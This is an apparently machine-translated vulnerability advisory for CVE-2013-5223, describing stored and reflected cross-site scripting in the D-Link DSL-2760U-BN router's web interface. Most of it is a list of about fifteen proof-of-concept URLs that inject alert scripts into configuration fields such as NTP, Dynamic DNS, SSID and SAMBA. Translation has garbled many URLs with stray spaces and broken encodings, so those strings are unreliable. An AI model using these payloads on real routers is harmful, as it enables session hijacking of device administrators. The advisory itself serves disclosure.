D-Link DSL-2760U-BN multiple cross-site scripting and HTML Injection Vulnerabilities
Release date:
Updated on:
Affected Systems:
D-Link DSL-2760U-BN
Description:
--------------------------------------------------------------------------------
Bugtraq id: 63648
CVE (CAN) ID: CVE-2013-5223
D-Link 2760N is a router product.
The D-Link 2760N has multiple stored and reflected cross-site scripting vulnerabilities in different sections of the Web UI. After successful exploitation, HTML and script code can be executed in the context of the affected browser.
<* Source: Liad Mizrachi
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
======================================
PoC
======================================
1) ets Settings
Http://www.example.com/sntpcfg.cgi? Ntp_enabled = 1 & ntpServer1 = locahost % 22; alert % 28% 27XSS % 27% 29; // & ntpServer2 = time-nw.nist.gov & ntpServer3 = & ntpServer4 = & ntpServer5 = & timezone_offset = + & timezone = Jerusalem & use_dst = 0
2) Dynamic DNS (Reflected/Stored)
Http://www.example.com/ddnsmngr.cmd? Action = add & service = 1 & hostname = aaaa & username = % 3 cscript % 3 ealert (% 27xss % 27) % 3c % 2 fscript % 3e & password = zzzzzz & iface = ppp0
3) Parental Control
Http://www.example.com/todmngr.tod? Action = add & username = % 3 Cscript % 3 Ealert % 28% 27xss % 27% 29% 3C/script % 3E & mac = f1: de: f1: AB: cb: 6d & days = 1 & start_time = 571 & end_time = 732
4) URL Filtering
Http://www.example.com/urlfilter.cmd? Action = set_url & TodUrlAdd = % 3 Cscript % 3 Ealert (% 27XSS % 27) % 3C/script % 3E & port_num = 80
5) NAT-Port Triggering
Http://www.example.com/scprttrg.cmd? Action = add & appName = % 3 Cscript % 3 Ealert (% 27XSS % 27) % 3C/script % 3E & dstWanIf = ppp0 & tStart = 1111, & tEnd = 1112, & tProto = 1, & oStart = 11, & oEnd = 11, & oProto = 1,
6) IP Filtering:
Http://www.example.com/scoutflt.cmd? Action = add & fltName = <script> alert ('xss ') </script> & protocol = 1 & srcAddr = 10.0.0.10 & srcMask = 255.255.255.0 & srcPort = 80 & dstAddr = 10.0.0.12 & dstMask = 255.255.255.0 & dstPort = 8080
7) IP Filtering-Removal Error:
Http://www.example.com/scoutflt.cmd? Action = remove & rmLst = % 3 Cscript % 3 Ealert % 28% 27XSS % 27% 29% 3C/script % 3E
8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup "):
Http://www.example.com/portmapcfg.cmd? Action = add & groupName = <Script> alert ('xss') </script> & choiceBox = | usb0 | wl0 | & wanIfName = atm1
9) SNMP
Http://www.example.com/snmpconfig.cgi? SnmpStatus = 1 & snmpRoCommunity = % 27; alert (% 27XSS % 27) & snmpRwCommunity = private & snmpSysName = D-LINK & snmpSysContact = unknown & snmpSysLocation = unknown & snmpTrapIp = 0.0.0
10) Incoming IP Filter:
Http://www.example.com/scinflt.cmd? Action = add & wanIf = ppp0 & fltName = <script> alert ('xss & protocol = 2 & srcAddr = ss ') </script> & srcMask = 255.255.255.0 & srcPort = 80 & dstAddr = 10.0.0.10 & dstMask = 255.255.255.0 & dstPort = 8080
11) Policy Routing Add:
Http://www.example.com/prmngr.cmd? Action = add & PolicyName = <script> alert ('x & SourceIp = ss'); </script> & lanIfcName = wl0 & wanIf = ppp0 & defaultgw = 10.0.0.111
12) Policy Routing-Removal Error:
Http://www.example.com/prmngr.cmd? Action = remove & rmLst = % 3 Cscript % 3 Ealert % 28% 27XSS % 27% 29% 3C/script % 3E
13) Printer Server
Http://www.example.com/ippcfg.cmd? Action = savapply & ippEnabled = 1 & ippMake = aa & ippName = aa "; alert ('xss-Printer-Sever ');//
14) SAMBA Configuration
Http://www.example.com/samba.cgi? EnableSmb = 1 & smbNetBiosName = '; var x = "XSS"; // & smbDirName = B'; alert (x ); // & smbUtf8DirName = bbb & smbCharset = utf8 & smbUnplug = nolug = no
OR
Http://www.example.com/samba.cgi? EnableSmb = 1 & smbNetBiosName = '; alert ("SAMBA-X & smbDirName = SS"); // & smbUtf8DirName = bbb & smbCharset = utf8 & smbUnplug = nolug = no
15) WiFi SSID
Step 1 (Create XSS as Wireless SSID ):
Http://www.example.com/wlcfg.wl? WlSsidIdx = 0 & wlEnbl = 1 & wlHide = 0 & wlAPIsolation = 0 & wlSsid = % 3 CScript % 3 Ealert (% 27 XSSID % 27) % 3C/script % 3E & wlCountry = IL & wlMaxAssoc = 16 & wlDisableWme = 0 & wlEnableWmf = 0 & Strong = 0 & wlSsid_wl0v1 = wl0_Guest1 & Strong = 0 & Strong = 0 & strong = 0 & bandwidth = 0 & bandwidth = 16 & wlEnbl_wl0v2 = 0 & wlSsid_wl0v2 = wl0_Guest2 & bandwidth = 0 & bandwidth = 0 & bandwidth = 0 & bandwidth = 0 & bandwidth = 16 & wlEnbl_wl0v3 = 0 & wlSsid_wl0v3 = wl0_Guest3 & wlHide_wl0v3 = 0 & wlAPIsolation_wl0v3 = 0 & Signature = 0 & wlEnableWmf_wl0v3 = 0 & Signature = 16
Step 2:
Goto the Wireless-> Security [http://www.example.com/wlsecurity.html]
OR
Goto the Wireless-> MAC Filter [http ://
Www.example.com/wlmacflt.cmd? Action = view]
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.dlink.com/
Http://www.dlink.com
Http://www.dlink.com.tr/en/arts/117.html
Http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf